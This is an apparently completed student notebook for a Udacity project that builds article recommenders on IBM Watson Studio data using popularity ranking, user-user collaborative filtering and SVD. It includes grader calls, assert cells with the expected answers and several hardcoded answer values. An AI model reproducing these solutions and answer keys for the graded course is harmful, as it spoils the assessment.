"# Recommendations with IBM\n\nIn this notebook, you will be putting your recommendation skills to use on real data from the IBM Watson Studio platform. \n\n\nYou may either submit your notebook through the workspace here, or you may work from your local machine and submit through the next page. Either way assure that your code passes the project [RUBRIC](https://review.udacity.com/#!/rubrics/2322/view). **Please save regularly.**\n\nBy following the table of contents, you will build out a number of different methods for making recommendations that can be used for different situations. \n\n\n## Table of Contents\n\nI. [Exploratory Data Analysis](#Exploratory-Data-Analysis)<br>\nII. [Rank Based Recommendations](#Rank)<br>\nIII. [User-User Based Collaborative Filtering](#User-User)<br>\nIV. [Content Based Recommendations (EXTRA - NOT REQUIRED)](#Content-Recs)<br>\nV. [Matrix Factorization](#Matrix-Fact)<br>\nVI. [Extras & Concluding](#conclusions)\n\nAt the end of the notebook, you will find directions for how to submit your work. Let's get started by importing the necessary libraries and reading in the data.",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport project_tests as t\nimport pickle\n\n%matplotlib inline\n\ndf = pd.read_csv('data/user-item-interactions.csv')\ndf_content = pd.read_csv('data/articles_community.csv')\ndel df['Unnamed: 0']\ndel df_content['Unnamed: 0']\n\n# Show df to get an idea of the data\ndf.head()",
"_____no_output_____"
],
[
"df.shape",
"_____no_output_____"
],
[
"df.article_id = df.article_id.astype('str')",
"_____no_output_____"
],
[
"# Show df_content to get an idea of the data\ndf_content.head()",
"_____no_output_____"
]
],
[
[
"### <a class=\"anchor\" id=\"Exploratory-Data-Analysis\">Part I : Exploratory Data Analysis</a>\n\nUse the dictionary and cells below to provide some insight into the descriptive statistics of the data.\n\n`1.` What is the distribution of how many articles a user interacts with in the dataset? Provide a visual and descriptive statistics to assist with giving a look at the number of times each user interacts with an article. ",
"_____no_output_____"
]
],
[
[
"count_interactions = df.groupby('email').count()['article_id']\nplt.hist(count_interactions, bins=30);\nplt.title('Number of times each user interacts with an article');\nplt.xlabel('Number of Interactions');\nplt.ylabel('Number of Articles');",
"_____no_output_____"
],
[
"# Fill in the median and maximum number of user_article interactios below\n\nmedian_val = df['email'].value_counts().median() # 50% of individuals interact with ____ number of articles or fewer.\nmax_views_by_user = df['email'].value_counts().max()# The maximum number of user-article interactions by any 1 user is ______.",
"_____no_output_____"
]
],
[
[
"`2.` Explore and remove duplicate articles from the **df_content** dataframe. ",
"_____no_output_____"
]
],
[
[
"# Find and explore duplicate articles\ndf_content[df_content.duplicated()]",
"_____no_output_____"
],
[
"# Remove any rows that have the same article_id - only keep the first\ndf_content.drop_duplicates(subset=['article_id'],keep='first',inplace=True)",
"_____no_output_____"
]
],
[
[
"`3.` Use the cells below to find:\n\n**a.** The number of unique articles that have an interaction with a user. \n**b.** The number of unique articles in the dataset (whether they have any interactions or not).<br>\n**c.** The number of unique users in the dataset. (excluding null values) <br>\n**d.** The number of user-article interactions in the dataset.",
"_____no_output_____"
]
],
[
[
"unique_articles = len(pd.unique(df['article_id']))# The number of unique articles that have at least one interaction\ntotal_articles = len(pd.unique(df_content['article_id']))# The number of unique articles on the IBM platform\nunique_users = len(pd.unique(df['email'].dropna()))# The number of unique users\nuser_article_interactions = len(df)# The number of user-article interactions",
"_____no_output_____"
]
],
[
[
"`4.` Use the cells below to find the most viewed **article_id**, as well as how often it was viewed. After talking to the company leaders, the `email_mapper` function was deemed a reasonable way to map users to ids. There were a small number of null values, and it was found that all of these null values likely belonged to a single user (which is how they are stored using the function below).",
"_____no_output_____"
]
],
[
[
"most_viewed_article_id = str(df.article_id.value_counts().axes[0][0])# The most viewed article in the dataset as a string with one value following the decimal \nmax_views = df.article_id.value_counts().max()# The most viewed article in the dataset was viewed how many times?",
"_____no_output_____"
],
[
"## No need to change the code here - this will be helpful for later parts of the notebook\n# Run this cell to map the user email to a user_id column and remove the email column\n\ndef email_mapper():\n coded_dict = dict()\n cter = 1\n email_encoded = []\n \n for val in df['email']:\n if val not in coded_dict:\n coded_dict[val] = cter\n cter+=1\n \n email_encoded.append(coded_dict[val])\n return email_encoded\n\nemail_encoded = email_mapper()\ndel df['email']\ndf['user_id'] = email_encoded\n\n# show header\ndf.head()",
"_____no_output_____"
],
[
"## If you stored all your results in the variable names above, \n## you shouldn't need to change anything in this cell\n\nsol_1_dict = {\n '`50% of individuals have _____ or fewer interactions.`': median_val,\n '`The total number of user-article interactions in the dataset is ______.`': user_article_interactions,\n '`The maximum number of user-article interactions by any 1 user is ______.`': max_views_by_user,\n '`The most viewed article in the dataset was viewed _____ times.`': max_views,\n '`The article_id of the most viewed article is ______.`': most_viewed_article_id,\n '`The number of unique articles that have at least 1 rating ______.`': unique_articles,\n '`The number of unique users in the dataset is ______`': unique_users,\n '`The number of unique articles on the IBM platform`': total_articles\n}\n\n# Test your dictionary against the solution\nt.sol_1_test(sol_1_dict)",
"It looks like you have everything right here! Nice job!\n"
]
],
[
[
"### <a class=\"anchor\" id=\"Rank\">Part II: Rank-Based Recommendations</a>\n\nUnlike in the earlier lessons, we don't actually have ratings for whether a user liked an article or not. We only know that a user has interacted with an article. In these cases, the popularity of an article can really only be based on how often an article was interacted with.\n\n`1.` Fill in the function below to return the **n** top articles ordered with most interactions as the top. Test your function using the tests below.",
"_____no_output_____"
]
],
[
[
"def get_top_articles(n, df=df):\n '''\n INPUT:\n n - (int) the number of top articles to return\n df - (pandas dataframe) df as defined at the top of the notebook \n \n OUTPUT:\n top_articles - (list) A list of the top 'n' article titles \n \n '''\n top_articles = df['title'].value_counts().axes[0][:n].tolist()\n \n return top_articles # Return the top article titles from df (not df_content)\n\ndef get_top_article_ids(n, df=df):\n '''\n INPUT:\n n - (int) the number of top articles to return\n df - (pandas dataframe) df as defined at the top of the notebook \n \n OUTPUT:\n top_articles - (list) A list of the top 'n' article titles \n \n '''\n top_articles = df['article_id'].value_counts().axes[0][:n].tolist()\n \n return top_articles # Return the top article ids",
"_____no_output_____"
],
[
"print(get_top_articles(10))\nprint(get_top_article_ids(10))",
"['use deep learning for image classification', 'insights from new york car accident reports', 'visualize car data with brunel', 'use xgboost, scikit-learn & ibm watson machine learning apis', 'predicting churn with the spss random tree algorithm', 'healthcare python streaming application demo', 'finding optimal locations of new store using decision optimization', 'apache spark lab, part 1: basic concepts', 'analyze energy consumption in buildings', 'gosales transactions for logistic regression model']\n['1429.0', '1330.0', '1431.0', '1427.0', '1364.0', '1314.0', '1293.0', '1170.0', '1162.0', '1304.0']\n"
],
[
"# Test your function by returning the top 5, 10, and 20 articles\ntop_5 = get_top_articles(5)\ntop_10 = get_top_articles(10)\ntop_20 = get_top_articles(20)\n\n# Test each of your three lists from above\nt.sol_2_test(get_top_articles)",
"Your top_5 looks like the solution list! Nice job.\nYour top_10 looks like the solution list! Nice job.\nYour top_20 looks like the solution list! Nice job.\n"
]
],
[
[
"### <a class=\"anchor\" id=\"User-User\">Part III: User-User Based Collaborative Filtering</a>\n\n\n`1.` Use the function below to reformat the **df** dataframe to be shaped with users as the rows and articles as the columns. \n\n* Each **user** should only appear in each **row** once.\n\n\n* Each **article** should only show up in one **column**. \n\n\n* **If a user has interacted with an article, then place a 1 where the user-row meets for that article-column**. It does not matter how many times a user has interacted with the article, all entries where a user has interacted with an article should be a 1. \n\n\n* **If a user has not interacted with an item, then place a zero where the user-row meets for that article-column**. \n\nUse the tests to make sure the basic structure of your matrix matches what is expected by the solution.",
"_____no_output_____"
]
],
[
[
"# create the user-article matrix with 1's and 0's\n\ndef create_user_item_matrix(df):\n '''\n INPUT:\n df - pandas dataframe with article_id, title, user_id columns\n \n OUTPUT:\n user_item - user item matrix \n \n Description:\n Return a matrix with user ids as rows and article ids on the columns with 1 values where a user interacted with \n an article and a 0 otherwise\n '''\n \n user_item = df.groupby(['user_id', 'article_id']).apply(lambda x:1).unstack().fillna(0)\n return user_item # return the user_item matrix \n\nuser_item = create_user_item_matrix(df)",
"_____no_output_____"
],
[
"## Tests: You should just need to run this cell. Don't change the code.\nassert user_item.shape[0] == 5149, \"Oops! The number of users in the user-article matrix doesn't look right.\"\nassert user_item.shape[1] == 714, \"Oops! The number of articles in the user-article matrix doesn't look right.\"\nassert user_item.sum(axis=1)[1] == 36, \"Oops! The number of articles seen by user 1 doesn't look right.\"\nprint(\"You have passed our quick tests! Please proceed!\")",
"You have passed our quick tests! Please proceed!\n"
],
[
"user_item.head(2)",
"_____no_output_____"
]
],
[
[
"`2.` Complete the function below which should take a user_id and provide an ordered list of the most similar users to that user (from most similar to least similar). The returned result should not contain the provided user_id, as we know that each user is similar to him/herself. Because the results for each user here are binary, it (perhaps) makes sense to compute similarity as the dot product of two users. \n\nUse the tests to test your function.",
"_____no_output_____"
]
],
[
[
"def find_similar_users(user_id, user_item=user_item):\n '''\n INPUT:\n user_id - (int) a user_id\n user_item - (pandas dataframe) matrix of users by articles: \n 1's when a user has interacted with an article, 0 otherwise\n \n OUTPUT:\n similar_users - (list) an ordered list where the closest users (largest dot product users)\n are listed first\n \n Description:\n Computes the similarity of every pair of users based on the dot product\n Returns an ordered\n \n '''\n# # compute similarity of each user to the provided user\n\n similarity = []\n for user in range(1, user_item.shape[0]+1):\n sim = np.dot(np.array(user_item.loc[user_id]),np.array(user_item.loc[user]))\n similarity.append((user, sim))\n\n # sort by similarity\n similarity.sort(key=lambda x: x[1], reverse=True)\n\n # create list of just the ids\n most_similar_users =[item[0] for item in similarity]\n\n # remove the own user's id\n most_similar_users.remove(user_id)\n return most_similar_users # return a list of the users in order from most to least similar\n ",
"_____no_output_____"
],
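[
"# Added sketch (assumption, not part of the original solution): the same dot-product similarity can be\n# computed for all users at once with a single matrix-vector product instead of a Python loop.\n# 'sims' is a new, illustrative name; ties may be ordered differently than in find_similar_users.\nsims = user_item.dot(user_item.loc[1])\nprint(sims.sort_values(ascending=False).drop(1).head(10).index.tolist())",
"_____no_output_____"
],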
[
"# Do a spot check of your function\nprint(\"The 10 most similar users to user 1 are: {}\".format(find_similar_users(1)[:10]))\nprint(\"The 5 most similar users to user 3933 are: {}\".format(find_similar_users(3933)[:5]))\nprint(\"The 3 most similar users to user 46 are: {}\".format(find_similar_users(46)[:3]))",
"The 10 most similar users to user 1 are: [3933, 23, 3782, 203, 4459, 131, 3870, 46, 4201, 49]\nThe 5 most similar users to user 3933 are: [1, 23, 3782, 203, 4459]\nThe 3 most similar users to user 46 are: [4201, 23, 3782]\n"
]
],
[
[
"`3.` Now that you have a function that provides the most similar users to each user, you will want to use these users to find articles you can recommend. Complete the functions below to return the articles you would recommend to each user. ",
"_____no_output_____"
]
],
[
[
"def get_article_names(article_ids, df=df):\n '''\n INPUT:\n article_ids - (list) a list of article ids\n df - (pandas dataframe) df as defined at the top of the notebook\n \n OUTPUT:\n article_names - (list) a list of article names associated with the list of article ids \n (this is identified by the title column)\n '''\n # Your code here\n article_names = []\n for article in article_ids:\n article_names.append(df[df.article_id == article]['title'].values[0])\n return article_names # Return the article names associated with list of article ids\n\n\ndef get_user_articles(user_id, user_item=user_item):\n '''\n INPUT:\n user_id - (int) a user id\n user_item - (pandas dataframe) matrix of users by articles: \n 1's when a user has interacted with an article, 0 otherwise\n \n OUTPUT:\n article_ids - (list) a list of the article ids seen by the user\n article_names - (list) a list of article names associated with the list of article ids \n (this is identified by the doc_full_name column in df_content)\n \n Description:\n Provides a list of the article_ids and article titles that have been seen by a user\n '''\n article_ids = user_item.loc[user_id][user_item.loc[user_id] == 1].index.tolist()\n article_names = get_article_names(article_ids)\n \n return article_ids, article_names # return the ids and names\n\n\ndef user_user_recs(user_id, m=10):\n '''\n INPUT:\n user_id - (int) a user id\n m - (int) the number of recommendations you want for the user\n \n OUTPUT:\n recs - (list) a list of recommendations for the user\n \n Description:\n Loops through the users based on closeness to the input user_id\n For each user - finds articles the user hasn't seen before and provides them as recs\n Does this until m recommendations are found\n \n Notes:\n Users who are the same closeness are chosen arbitrarily as the 'next' user\n \n For the user where the number of recommended articles starts below m \n and ends exceeding m, the last items are chosen arbitrarily\n \n '''\n recs = set()\n most_similar_users = find_similar_users(user_id)\n seen_aritcle,_ = get_user_articles(user_id)\n for user in most_similar_users:\n neighbs_likes,_ = get_user_articles(user)\n new_recs = np.setdiff1d(neighbs_likes, seen_aritcle, assume_unique=True)\n for item in new_recs:\n recs.add(item)\n if len(recs) > m-1:\n return recs\n return recs # return your recommendations for this user_id ",
"_____no_output_____"
],
[
"# Check Results\nget_article_names(user_user_recs(1, 10)) # Return 10 recommendations for user 1",
"_____no_output_____"
],
[
"# Test your functions here - No need to change this code - just run this cell\nassert set(get_article_names(['1024.0', '1176.0', '1305.0', '1314.0', '1422.0', '1427.0'])) == set(['using deep learning to reconstruct high-resolution audio', 'build a python app on the streaming analytics service', 'gosales transactions for naive bayes model', 'healthcare python streaming application demo', 'use r dataframes & ibm watson natural language understanding', 'use xgboost, scikit-learn & ibm watson machine learning apis']), \"Oops! Your the get_article_names function doesn't work quite how we expect.\"\nassert set(get_article_names(['1320.0', '232.0', '844.0'])) == set(['housing (2015): united states demographic measures','self-service data preparation with ibm data refinery','use the cloudant-spark connector in python notebook']), \"Oops! Your the get_article_names function doesn't work quite how we expect.\"\nassert set(get_user_articles(20)[0]) == set(['1320.0', '232.0', '844.0'])\nassert set(get_user_articles(20)[1]) == set(['housing (2015): united states demographic measures', 'self-service data preparation with ibm data refinery','use the cloudant-spark connector in python notebook'])\nassert set(get_user_articles(2)[0]) == set(['1024.0', '1176.0', '1305.0', '1314.0', '1422.0', '1427.0'])\nassert set(get_user_articles(2)[1]) == set(['using deep learning to reconstruct high-resolution audio', 'build a python app on the streaming analytics service', 'gosales transactions for naive bayes model', 'healthcare python streaming application demo', 'use r dataframes & ibm watson natural language understanding', 'use xgboost, scikit-learn & ibm watson machine learning apis'])\nprint(\"If this is all you see, you passed all of our tests! Nice job!\")",
"If this is all you see, you passed all of our tests! Nice job!\n"
]
],
[
[
"`4.` Now we are going to improve the consistency of the **user_user_recs** function from above. \n\n* Instead of arbitrarily choosing when we obtain users who are all the same closeness to a given user - choose the users that have the most total article interactions before choosing those with fewer article interactions.\n\n\n* Instead of arbitrarily choosing articles from the user where the number of recommended articles starts below m and ends exceeding m, choose the articles with the most total interactions before choosing those with fewer total interactions. This ranking should be what would be obtained from the **top_articles** function you wrote earlier.",
"_____no_output_____"
]
],
[
[
"def get_article_order(user_id,counts):\n '''\n INPUT:\n user_id - (int)\n counts - (pandas Series) value_counts\n \n OUTPUT:\n top_articles - (list) A list of article id sorted by interactions\n \n '''\n ids,titles = get_user_articles(user_id)\n dic = {}\n for this_id in ids:\n dic[this_id] = counts[this_id]\n dic_sort = sorted(dic.items(), key=lambda d:d[1], reverse = True)\n article_order = [item[0] for item in dic_sort]\n return article_order",
"_____no_output_____"
],
[
"def get_top_sorted_users(user_id, df=df, user_item=user_item):\n    '''\n    INPUT:\n    user_id - (int)\n    df - (pandas dataframe) df as defined at the top of the notebook\n    user_item - (pandas dataframe) matrix of users by articles: \n                1's when a user has interacted with an article, 0 otherwise\n    \n    OUTPUT:\n    neighbors_df - (pandas dataframe) a dataframe with:\n                    neighbor_id - is a neighbor user_id\n                    similarity - measure of the similarity of each user to the provided user_id\n                    num_interactions - the number of articles viewed by the user\n    \n    Other Details - sort the neighbors_df by the similarity and then by number of interactions where \n                    highest of each is higher in the dataframe\n    \n    '''\n    neighbor_id = []\n    similarity = []\n    num_interactions = []\n    # compute the dot-product similarity of every other (unique) user to the provided user\n    for user in df.user_id.unique():\n        if user == user_id:\n            continue\n        neighbor_id.append(user)\n        score = np.dot(np.array(user_item.loc[user_id]), np.array(user_item.loc[user]).T)\n        similarity.append(score)\n        interactions = len(df[df.user_id == user])\n        num_interactions.append(interactions)\n    neighbors_df = pd.DataFrame({'neighbor_id': neighbor_id, 'similarity': similarity, 'num_interactions': num_interactions})\n    # highest similarity (and then most interactions) first, as described in the docstring\n    neighbors_df = neighbors_df.sort_values(by=['similarity', 'num_interactions'], ascending=False)\n    return neighbors_df # Return the dataframe specified in the doc_string\n\n\ndef user_user_recs_part2(user_id, m=10, df=df):\n    '''\n    INPUT:\n    user_id - (int) a user id\n    m - (int) the number of recommendations you want for the user\n    \n    OUTPUT:\n    recs - (list) a list of recommendations for the user by article id\n    rec_names - (list) a list of recommendations for the user by article title\n    \n    Description:\n    Loops through the users based on closeness to the input user_id\n    For each user - finds articles the user hasn't seen before and provides them as recs\n    Does this until m recommendations are found\n    \n    Notes:\n    * Choose the users that have the most total article interactions \n    before choosing those with fewer article interactions.\n\n    * Choose the articles with the most total interactions \n    before choosing those with fewer total interactions. \n    \n    '''\n    recs = []\n    neighbors_df = get_top_sorted_users(user_id)\n    seen_articles, _ = get_user_articles(user_id)\n    neighbors_id = neighbors_df['neighbor_id'].values\n    counts = df.article_id.value_counts()\n    for neighbor in neighbors_id:\n        if len(recs) == m:\n            break\n        # articles read by this neighbor, ordered by their total number of interactions\n        new_rec = get_article_order(neighbor, counts)\n\n        for this_rec in new_rec:\n            # only recommend articles the user has not interacted with yet\n            if this_rec not in recs and this_rec not in seen_articles:\n                recs.append(this_rec)\n            if len(recs) == m:\n                break\n\n    rec_names = get_article_names(recs)\n    return recs, rec_names",
"_____no_output_____"
],
[
"# Quick spot check - don't change this code - just use it to test your functions\nrec_ids, rec_names = user_user_recs_part2(20, 10)\nprint(\"The top 10 recommendations for user 20 are the following article ids:\")\nprint(rec_ids)\nprint()\nprint(\"The top 10 recommendations for user 20 are the following article names:\")\nprint(rec_names)",
"The top 10 recommendations for user 20 are the following article ids:\n['173.0', '1432.0', '1431.0', '593.0', '1162.0', '18.0', '911.0', '111.0', '1436.0', '880.0']\n\nThe top 10 recommendations for user 20 are the following article names:\n['10 must attend data science, ml and ai conferences in 2018', 'visualize data with the matplotlib library', 'visualize car data with brunel', 'upload files to ibm data science experience using the command line', 'analyze energy consumption in buildings', 'the greatest public datasets for ai – startup grind', 'using machine learning to predict baseball injuries', 'tidy up your jupyter notebooks with scripts', 'welcome to pixiedust', 'probabilistic graphical models tutorial\\u200a—\\u200apart 1 – stats and bots']\n"
]
],
[
[
"`5.` Use your functions from above to correctly fill in the solutions to the dictionary below. Then test your dictionary against the solution. Provide the code you need to answer each following the comments below.",
"_____no_output_____"
]
],
[
[
"### Tests with a dictionary of results\n\nuser1_most_sim = find_similar_users(1)[0]# Find the user that is most similar to user 1 \nuser131_10th_sim = find_similar_users(131)[9]# Find the 10th most similar user to user 131",
"_____no_output_____"
],
[
"## Dictionary Test Here\nsol_5_dict = {\n 'The user that is most similar to user 1.': user1_most_sim, \n 'The user that is the 10th most similar to user 131': user131_10th_sim,\n}\n\nt.sol_5_test(sol_5_dict)",
"This all looks good! Nice job!\n"
]
],
[
[
"`6.` If we were given a new user, which of the above functions would you be able to use to make recommendations? Explain. Can you think of a better way we might make recommendations? Use the cell below to explain a better method for new users.",
"_____no_output_____"
],
[
"A new user has no reading records, so we cannot infer what they like from past interactions (the cold start problem). For such users I would use get_top_articles to recommend the most popular articles. A better approach might be to group articles into categories and recommend the top articles from each category; this would also help us learn more about the new user's preferences.",
"_____no_output_____"
],
[
"`7.` Using your existing functions, provide the top 10 recommended articles you would provide for a new user below. You can test your function against our thoughts to make sure we are all on the same page with how we might make a recommendation.",
"_____no_output_____"
]
],
[
[
"new_user = '0.0'\n\n# What would your recommendations be for this new user '0.0'? As a new user, they have no observed articles.\n# Provide a list of the top 10 article ids you would give to \nnew_user_recs = df['article_id'].value_counts().axes[0][:10].tolist()# Your recommendations here\n\n",
"_____no_output_____"
],
[
"assert set(new_user_recs) == set(['1314.0','1429.0','1293.0','1427.0','1162.0','1364.0','1304.0','1170.0','1431.0','1330.0']), \"Oops! It makes sense that in this case we would want to recommend the most popular articles, because we don't know anything about these users.\"\n\nprint(\"That's right! Nice job!\")",
"That's right! Nice job!\n"
]
],
[
[
"### <a class=\"anchor\" id=\"Matrix-Fact\">Part IV: Matrix Factorization</a>\n\nIn this part of the notebook, you will use matrix factorization to make article recommendations to the users on the IBM Watson Studio platform.\n\n`1.` You should have already created a **user_item** matrix in **question 1** of **Part III** above. This first question here will just require that you run the cells to get things set up for the rest of **Part IV** of the notebook. ",
"_____no_output_____"
]
],
[
[
"# Load the matrix here\nuser_item_matrix = pd.read_pickle('user_item_matrix.p')",
"_____no_output_____"
],
[
"# quick look at the matrix\nuser_item_matrix.head()",
"_____no_output_____"
]
],
[
[
"`2.` In this situation, you can use Singular Value Decomposition from [numpy](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.linalg.svd.html) on the user-item matrix. Use the cell to perform SVD, and explain why this is different than in the lesson.",
"_____no_output_____"
]
],
[
[
"# Perform SVD on the User-Item Matrix Here\n\nu, s, vt = np.linalg.svd(user_item_matrix)# use the built in to get the three matrices",
"_____no_output_____"
]
],
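[
[
"# Added sketch (assumption, not part of the original notebook): inspect the shapes returned by numpy's\n# SVD and rebuild an estimate of the matrix from k latent features, as done in the next section.\n# The value k = 10 is purely illustrative.\nprint(u.shape, s.shape, vt.shape)\nk = 10\nuser_item_est = np.around(np.dot(np.dot(u[:, :k], np.diag(s[:k])), vt[:k, :]))\nprint(user_item_est.shape)",
"_____no_output_____"
]
],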
[
[
"In the lesson, the user-item matrix contained missing values, so SVD could not be applied directly. In this project, if a user and an article have not interacted with each other the value is simply 0, so the matrix has no missing values and numpy's SVD runs without any error.",
"_____no_output_____"
],
[
"**Provide your response here.**",
"_____no_output_____"
],
[
"`3.` Now for the tricky part, how do we choose the number of latent features to use? Running the below cell, you can see that as the number of latent features increases, we obtain a lower error rate on making predictions for the 1 and 0 values in the user-item matrix. Run the cell below to get an idea of how the accuracy improves as we increase the number of latent features.",
"_____no_output_____"
]
],
[
[
"num_latent_feats = np.arange(10,700+10,20)\nsum_errs = []\n\nfor k in num_latent_feats:\n # restructure with k latent features\n s_new, u_new, vt_new = np.diag(s[:k]), u[:, :k], vt[:k, :]\n \n # take dot product\n user_item_est = np.around(np.dot(np.dot(u_new, s_new), vt_new))\n \n # compute error for each prediction to actual value\n diffs = np.subtract(user_item_matrix, user_item_est)\n \n # total errors and keep track of them\n err = np.sum(np.sum(np.abs(diffs)))\n sum_errs.append(err)\n \n \nplt.plot(num_latent_feats, 1 - np.array(sum_errs)/df.shape[0]);\nplt.xlabel('Number of Latent Features');\nplt.ylabel('Accuracy');\nplt.title('Accuracy vs. Number of Latent Features');",
"_____no_output_____"
]
],
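[
[
"# Added sketch (assumption, not part of the original notebook): because the matrix is mostly zeros,\n# accuracy is dominated by the 0 class. Precision/recall/F1 on the 1s for a single, arbitrary k give a\n# better sense of how well actual interactions are recovered.\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nk = 100\nest = np.around(np.dot(np.dot(u[:, :k], np.diag(s[:k])), vt[:k, :]))\ny_true = user_item_matrix.values.flatten().astype(int)\ny_pred = np.clip(est, 0, 1).flatten().astype(int)\nprint('precision:', precision_score(y_true, y_pred))\nprint('recall:', recall_score(y_true, y_pred))\nprint('f1:', f1_score(y_true, y_pred))",
"_____no_output_____"
]
],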
[
[
"`4.` From the above, we can't really be sure how many features to use, because simply having a better way to predict the 1's and 0's of the matrix doesn't exactly give us an indication of if we are able to make good recommendations. Instead, we might split our dataset into a training and test set of data, as shown in the cell below. \n\nUse the code from question 3 to understand the impact on accuracy of the training and test sets of data with different numbers of latent features. Using the split below: \n\n* How many users can we make predictions for in the test set? \n* How many users are we not able to make predictions for because of the cold start problem?\n* How many movies can we make predictions for in the test set? \n* How many movies are we not able to make predictions for because of the cold start problem?",
"_____no_output_____"
]
],
[
[
"df_train = df.head(40000)\ndf_test = df.tail(5993)\n\ndef create_test_and_train_user_item(df_train, df_test):\n '''\n INPUT:\n df_train - training dataframe\n df_test - test dataframe\n \n OUTPUT:\n user_item_train - a user-item matrix of the training dataframe \n (unique users for each row and unique articles for each column)\n user_item_test - a user-item matrix of the testing dataframe \n (unique users for each row and unique articles for each column)\n test_idx - all of the test user ids\n test_arts - all of the test article ids\n \n '''\n \n user_item_train = create_user_item_matrix(df_train)\n train_idx = user_item_train.index.tolist()\n train_arts = user_item_train.columns.tolist()\n \n user_item_test = create_user_item_matrix(df_test)\n test_idx = user_item_test.index.tolist()\n test_arts = user_item_test.columns.tolist()\n # choose user_ids and article_ids that have exit in train data \n common_idx = np.intersect1d(train_idx,test_idx)\n common_arts = np.intersect1d(train_arts,test_arts)\n user_item_test = user_item_test.loc[common_idx,common_arts]\n return user_item_train, user_item_test, test_idx, test_arts\n\nuser_item_train, user_item_test, test_idx, test_arts = create_test_and_train_user_item(df_train, df_test)",
"_____no_output_____"
],
[
"user_item_test.shape[0]",
"_____no_output_____"
],
[
"print(len(test_idx)-user_item_test.shape[0])",
"662\n"
],
[
"print(len(test_arts))",
"574\n"
],
[
"print(len(test_arts)-user_item_test.shape[1])",
"0\n"
],
[
"# Replace the values in the dictionary below\na = 662 \nb = 574 \nc = 20 \nd = 0 \n\n\nsol_4_dict = {\n 'How many users can we make predictions for in the test set?':c,\n 'How many users in the test set are we not able to make predictions for because of the cold start problem?': a,\n 'How many movies can we make predictions for in the test set?': b,\n 'How many movies in the test set are we not able to make predictions for because of the cold start problem?': d\n}\n\nt.sol_4_test(sol_4_dict)",
"Awesome job! That's right! All of the test movies are in the training data, but there are only 20 test users that were also in the training set. All of the other users that are in the test set we have no data on. Therefore, we cannot make predictions for these users using SVD.\n"
]
],
[
[
"`5.` Now use the **user_item_train** dataset from above to find **U**, **S**, and **V** transpose using SVD. Then find the subset of rows in the **user_item_test** dataset that you can predict using this matrix decomposition with different numbers of latent features to see how many features makes sense to keep based on the accuracy on the test data. This will require combining what was done in questions `2` - `4`.\n\nUse the cells below to explore how well SVD works towards making predictions for recommendations on the test data. ",
"_____no_output_____"
]
],
[
[
"# fit SVD on the user_item_train matrix\nu_train, s_train, vt_train = np.linalg.svd(user_item_train)# fit svd similar to above then use the cells below",
"_____no_output_____"
],
[
"user_item_test.head(2)",
"_____no_output_____"
],
[
"def get_error(s,u,v,user_item,k=100):\n '''\n INPUT:\n s,u,v: result of svd training\n user_item:user_item matrices\n k: - (int) numbers of latent feature\n OUTPUT:\n err - error\n \n '''\n s_new, u_new, vt_new = np.diag(s[:k]), u[:, :k], v[:k, :]\n # take dot product\n user_item_est = np.around(np.dot(np.dot(u_new, s_new), vt_new))\n\n # compute error for each prediction to actual value\n diffs = np.subtract(user_item, user_item_est)\n\n # total errors and keep track of them\n err = np.sum(np.sum(np.abs(diffs)))/(diffs.shape[0] * diffs.shape[1])\n return err",
"_____no_output_____"
],
[
"# decomposition to predict on test data\n# restructure with k latent features\nnum_latent_feats = np.arange(10,700+10,20)\npredict_list = []\ntrain_list = []\nfor k in num_latent_feats:\n # get test result \n article_index = []\n for article in user_item_test.columns.tolist():\n article_index.append(user_item_train.columns.get_loc(article))\n \n user_index = []\n for user in user_item_test.index.tolist():\n user_index.append(user_item_train.index.get_loc(user))\n \n u_test = u_train[user_index,:]\n vt_test = vt_train[:,article_index]\n # training and testing \n predict = 1 - get_error(s_train,u_test,vt_test,user_item=user_item_test,k=k)\n train = 1- get_error(s_train,u_train,vt_train,user_item=user_item_train,k=k)\n predict_list.append(predict)\n train_list.append(train)",
"_____no_output_____"
],
[
"plt.plot(num_latent_feats,predict_list,num_latent_feats,train_list,'r')\nplt.legend(('test', 'train'), loc='center right')\nplt.title('Training and testing accuracy for different numbers of latent features')\nplt.xlabel('Number of latent features')\nplt.ylabel('Accuracy')\nplt.show()",
"_____no_output_____"
]
],
[
[
"`6.` Use the cell below to comment on the results you found in the previous question. Given the circumstances of your results, discuss what you might do to determine if the recommendations you make with any of the above recommendation systems are an improvement to how users currently find articles? ",
"_____no_output_____"
],
[
"- Training and testing accuracy both look high here, but the numbers are hard to interpret because the data is sparse: most labels are 0, so a model can score well simply by predicting 0 everywhere.\n- First, if the user is new, I would use get_top_articles to recommend articles. Otherwise, I would find the most similar users based on the articles they have read, and recommend articles that those similar users have read but the target user has not.\n- Then, I would run an A/B test to find out whether my recommendation system works: randomly split users into two groups, let one group read articles from the old system and the other group receive articles from my recommendation system, and finally compare the click-through rates of the two groups.\n",
"_____no_output_____"
],
[
"<a id='conclusions'></a>\n### Extras\nUsing your workbook, you could now save your recommendations for each user, develop a class to make new predictions and update your results, and make a flask app to deploy your results. These tasks are beyond what is required for this project. However, from what you learned in the lessons, you are certainly capable of taking these tasks on to improve upon your work here!\n\n\n## Conclusion\n\n> Congratulations! You have reached the end of the Recommendations with IBM project! \n\n> **Tip**: Once you are satisfied with your work here, check over your report to make sure that it satisfies all the areas of the [rubric](https://review.udacity.com/#!/rubrics/2322/view). You should also probably remove all of the \"Tips\" like this one so that the presentation is as polished as possible.\n\n\n## Directions to Submit\n\n> Before you submit your project, you need to create a .html or .pdf version of this notebook in the workspace here. To do that, run the code cell below. If it worked correctly, you should get a return code of 0, and you should see the generated .html file in the workspace directory (click on the orange Jupyter icon in the upper left).\n\n> Alternatively, you can download this report as .html via the **File** > **Download as** submenu, and then manually upload it into the workspace directory by clicking on the orange Jupyter icon in the upper left, then using the Upload button.\n\n> Once you've done this, you can submit your project by clicking on the \"Submit Project\" button in the lower right here. This will create and submit a zip file with this .ipynb doc and the .html or .pdf version you created. Congratulations! ",
"_____no_output_____"
]
],
[
[
"from subprocess import call\ncall(['python', '-m', 'nbconvert', 'Recommendations_with_IBM.ipynb'])",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
